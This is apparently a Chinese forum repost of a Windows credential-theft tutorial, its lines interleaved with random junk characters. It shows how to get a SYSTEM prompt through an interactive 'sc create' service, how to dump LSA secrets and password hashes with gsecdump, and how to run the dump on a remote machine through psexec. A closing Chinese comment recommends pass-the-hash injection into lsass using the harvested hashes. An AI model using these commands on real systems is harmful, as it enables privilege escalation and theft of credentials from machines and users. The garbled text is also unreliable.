o get a DOS Prompt as NT system:
- M- ]% D( P4 A5 M6 p8 C5 ]1 g5 G& L
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
( K2 |7 G( x; `& y[SC] CreateService SUCCESS/ B# b/ M! r, c; t
0 {; _" e5 q# `C:\>sc start shellcmdline4 x- f) Q; l1 {) M" u& D$ E1 v2 S
[SC] StartService FAILED 1053:
! [( L/ X* h* J! A$ D- W" I2 I" X: n; D) }
The service did not respond to the start or control request in a timely fashion.
8 H0 v. y5 m6 y! l1 F6 c
3 Z- \+ H- ^& v5 o) PC:\>sc delete shellcmdline
' M& z6 [) ?3 J5 @ r[SC] DeleteService SUCCESS
! O3 R, `5 r1 M' U
[0 B- f+ R3 j5 Y9 S------------
3 d1 o. w% G2 S9 ~% B9 [/ R7 T8 E
4 u6 i, L" w/ ^1 eThen in the new DOS window:
; [- r: A' Z' x9 c
- N. j: g; |/ W RMicrosoft Windows XP [Version 5.1.2600]
& o- r! z. m' J% v, J% D1 t(C) Copyright 1985-2001 Microsoft Corp.
( T' S; ~* p' G
0 D- e# K+ |$ D, G- TC:\WINDOWS\system32>whoami. o# f Q$ @, a- E4 e6 v; ?" i
NT AUTHORITY\SYSTEM
4 l- F& _& f% h! M! H3 Z3 h6 {6 D1 G( J* [# _, w
C:\WINDOWS\system32>gsecdump -h
. M1 b [" | ` r0 v$ H. cgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
# \7 `" `# H0 a4 k) g& ?- Nusage: gsecdump [options]% k: \. l" F6 R
1 D3 E0 O( w, G. i" Ioptions:5 U0 R0 s5 T; V' Q( G0 f
-h [ --help ] show help5 w E' G" d) T- r/ P) \' S, u- q
-a [ --dump_all ] dump all secrets o6 u& x! f" j$ q' n: D
-l [ --dump_lsa ] dump lsa secrets
) y% K% c: a/ U' E+ n4 q" `-w [ --dump_wireless ] dump microsoft wireless connections
Y% o* [2 K0 \+ r; U+ C0 O9 V-u [ --dump_usedhashes ] dump hashes from active logon sessions/ k8 X& O+ F; g% ~" G
-s [ --dump_hashes ] dump hashes from SAM/AD/ Z; I5 L1 Q. P1 p- W3 ]& B r" h
6 k0 i" m- V/ l4 P/ Q W
Although I like to use:
6 X* O" Y! X0 |: E4 T% M, f9 Q
k! c" P1 V- ^& i lPsExec v1.83 - Execute processes remotely
% J+ f! O: ?6 P% p# ^5 S, y+ j4 yCopyright (C) 2001-2007 Mark Russinovich
& K; k& q7 _: ]. f. mSysinternals - 链接标记[url]www.sysinternals.com[/url]
% k+ t u% R0 F- `9 g) m0 X j% _; ?3 L3 N* u
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT( t) I! I4 ^$ D/ F
: U# E# y4 {2 X" d+ J
to get the hashes from active logon sessions of a remote system.
, i$ _4 @# r. k: Q
" y- T/ {6 m, L Z) _& ]These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
. X0 i6 a+ p- w k" T3 D9 x
! C& @0 Y" ^& o& q/ n提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
9 x2 q5 S5 ]2 y原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
}2 ?; ~4 |. Y, h, v6 R5 D% d* w1 W9 ^( X
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
$ z$ t# r; T% U4 L- C8 Z$ x |